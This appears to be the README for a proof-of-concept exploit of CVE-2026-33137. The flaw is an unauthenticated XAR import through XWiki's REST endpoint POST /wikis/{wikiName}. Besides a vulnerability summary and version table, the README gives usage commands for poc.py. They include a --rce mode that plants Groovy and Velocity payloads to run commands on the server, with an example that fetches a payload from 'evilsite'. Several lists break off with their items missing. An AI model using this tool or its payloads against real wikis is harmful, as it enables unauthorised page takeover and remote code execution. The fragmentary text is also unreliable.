
XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}
XWiki Platform - Importación XAR no autenticada vía REST /wikis/{wikiName}
El endpoint de la API REST POST /wikis/{wikiName} en XWiki Platform ejecuta una importación de XAR (XWiki Archive) sin realizar ninguna verificación de autenticación o autorización. Un atacante no autenticado puede crear o actualizar documentos arbitrarios en el wiki objetivo enviando un archivo XAR manipulado.
AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N| Estado | Versiones |
|---|---|
| Vulnerable | > 15.10.16, > 16.4.6, > 16.10.2 |
| Corregido | 16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1 |
Un atacante no autenticado puede:
El endpoint REST POST /xwiki/rest/wikis/{wikiName} acepta un archivo XAR en el cuerpo de la solicitud y lo importa directamente al wiki sin verificar si el solicitante tiene derechos ADMIN. La corrección (commit 4b7b95b) añade una verificación de autorización usando ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).
# Install requirements
pip install requests
# Basic usage
python poc.py -t http://target:8080
# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage
# Probe the target first
python poc.py -t http://target:8080 --probe
# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080
# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"
# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"
# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass
--rce)La bandera --rce importa páginas que contienen payloads de Groovy y Velocity que ejecutan la cadena de comando especificada. Automáticamente:
{{groovy}} y {{velocity}}Requisitos para un RCE exitoso:
-u / --password)package.xml - descriptor del paquete{Space}/{Page}.xml - XML del documento con contenidoEste PoC se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado de este exploit contra sistemas que no poseas o para los que no tengas permiso explícito para probar es ilegal. El autor no es responsable de ningún uso indebido o daño causado por este software.